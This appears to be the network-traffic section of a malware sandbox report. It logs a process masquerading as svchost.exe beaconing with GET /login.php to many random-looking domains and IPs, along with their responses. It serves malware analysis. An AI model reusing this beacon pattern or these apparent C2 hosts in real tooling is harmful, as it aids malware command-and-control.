2 | 192.168.2.4 | 55320 | 3.64.163.50 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 08:58:45.087038040 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: puzylyp.com
Sep 8, 2024 08:58:48.768999100 CEST | 689 | IN | HTTP/1.1 410 Gone
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:48 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 542
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Sep 8, 2024 08:58:48.779644012 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: puzylyp.com
Sep 8, 2024 08:58:48.971295118 CEST | 689 | IN | HTTP/1.1 410 Gone
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:48 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 542
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 55321 | 23.253.46.64 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 08:58:45.089159012 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyqah.com
Sep 8, 2024 08:58:45.600321054 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:44 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Sep 8, 2024 08:58:45.600353956 CEST | 169 | IN
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 55322 | 178.162.203.226 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 08:58:45.269939899 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 55323 | 44.221.84.105 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 08:58:45.286434889 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qetyfuv.com
Sep 8, 2024 08:58:45.773612976 CEST | 409 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:45 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=544a30587fdad065d67fe3028a6f3545|8.46.123.33|1725778725|1725778725|0|1|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 55324 | 18.208.156.248 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 08:58:45.297926903 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vonypom.com
Sep 8, 2024 08:58:45.791286945 CEST | 409 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:45 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=4c3b18806614f5c52f005f1d35e37aa2|8.46.123.33|1725778725|1725778725|0|1|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 55325 | 44.221.84.105 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 08:58:45.305692911 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vocyzit.com
Sep 8, 2024 08:58:45.770370007 CEST | 409 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:45 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=f1fee2dad8c9ca8dc6d412a68ea43de1|8.46.123.33|1725778725|1725778725|0|1|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 55326 | 199.191.50.83 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 08:58:45.320972919 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: galyqaz.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 55327 | 3.94.10.34 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 08:58:45.324522972 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lymyxid.com
Sep 8, 2024 08:58:45.792171955 CEST | 409 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:45 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=cd4934b955de651c33f6bd9483291e53|8.46.123.33|1725778725|1725778725|0|1|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 55328 | 69.162.80.62 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 08:58:45.521517038 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyfyj.com
Sep 8, 2024 08:58:46.047544003 CEST | 362 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                            cache-control: max-age=0, private, must-revalidate
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            content-length: 11
                                                                                                                                                                                                            date: Sun, 08 Sep 2024 06:58:45 GMT
                                                                                                                                                                                                            location: http://ww1.lysyfyj.com
                                                                                                                                                                                                            server: nginx
                                                                                                                                                                                                            set-cookie: sid=cabcb30f-6daf-11ef-bf0d-9c5eae0a9761; path=/; domain=.lysyfyj.com; expires=Fri, 26 Sep 2092 10:12:52 GMT; max-age=2147483647; HttpOnly
                                                                                                                                                                                                            Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                                                                                                                                                                            Data Ascii: Redirecting


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 55329 | 154.212.231.82 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 08:58:45.545397043 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyniw.com
Sep 8, 2024 08:58:46.617130041 CEST | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:46 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Sep 8, 2024 08:58:46.618666887 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyniw.com
Sep 8, 2024 08:58:47.036408901 CEST | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:46 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 55330 | 3.64.163.50 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 08:58:45.598859072 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vojyqem.com
Sep 8, 2024 08:58:49.205406904 CEST | 689 | IN | HTTP/1.1 410 Gone
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:49 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 542
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Sep 8, 2024 08:58:49.209492922 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vojyqem.com
Sep 8, 2024 08:58:49.404689074 CEST | 689 | IN | HTTP/1.1 410 Gone
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:49 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 542
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 55331 | 23.253.46.64 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 08:58:45.610352993 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyqah.com
Sep 8, 2024 08:58:46.103749037 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:44 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Sep 8, 2024 08:58:46.103765011 CEST | 169 | IN | Data Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 55333 | 208.91.196.145 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 08:58:46.623604059 CEST | 312 | OUT | GET / HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: ww1.lysyfyj.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cookie: sid=cabcb30f-6daf-11ef-bf0d-9c5eae0a9761


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 55334 | 178.162.203.226 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 08:58:46.930376053 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 55343 | 199.191.50.83 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 08:59:06.696077108 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: galyqaz.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 55344 | 69.162.80.62 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 08:59:08.009785891 CEST | 293 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyfyj.com
                                                                                                                                                                                                            Cookie: sid=cabcb30f-6daf-11ef-bf0d-9c5eae0a9761
Sep 8, 2024 08:59:08.538455963 CEST | 772 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            cache-control: max-age=0, private, must-revalidate
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            content-length: 481
                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                            date: Sun, 08 Sep 2024 06:59:08 GMT
                                                                                                                                                                                                            server: nginx
                                                                                                                                                                                                            Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNTc4NTk0OCwiaWF0IjoxNzI1Nzc4NzQ4LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydnBqNTg2ZnV0MGR0bWE4Z2swdW1rcWMiLCJuYmYiOjE3MjU3Nzg3NDgsInRzIjoxNzI1Nzc4NzQ4NDc4MjE1fQ.9zHuoOBHgARzq5WxV7T8_hIImeglxwjiZY7HRIfNapc&sid=cabcb30f-6daf-11ef-bf0d-9c5eae0a9761');</script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 55356 | 188.114.96.3 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 08:59:28.862461090 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
Sep 8, 2024 08:59:29.639673948 CEST | 799 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:59:29 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://lysyvan.com/login.php
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QLUjyn4iKqRXGUyZpSb4%2BmJ04TjTfc5M3eK0VfLUfPF72AiGchqo%2FOTkN%2Bac1XtyjNJKfI%2B6Px2wasVER%2Bq7SMabvHn4CTkWsoZtiZhdxAT2AcelJ8Lmc%2BFDeV%2FisQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8bfd0e5c0b8b4368-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Sep 8, 2024 08:59:30.944328070 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
Sep 8, 2024 08:59:31.313548088 CEST | 620 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:59:31 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://lysyvan.com/login.php
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2mfcUd%2FZbmR0OdEDZP1R5%2FgOSI0yRmo%2FK%2FWFDLdPSIlBZrPSFK0vGfc9KoLoB4YyJ22pkV6qMAoAYzudnSFzZLDKeREACiHGR25EbzF7S9GPjPxRxQT7VpTQiwsf9g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8bfd0e66bb064368-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
Sep 8, 2024 08:59:31.418941975 CEST | 173 | IN | Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


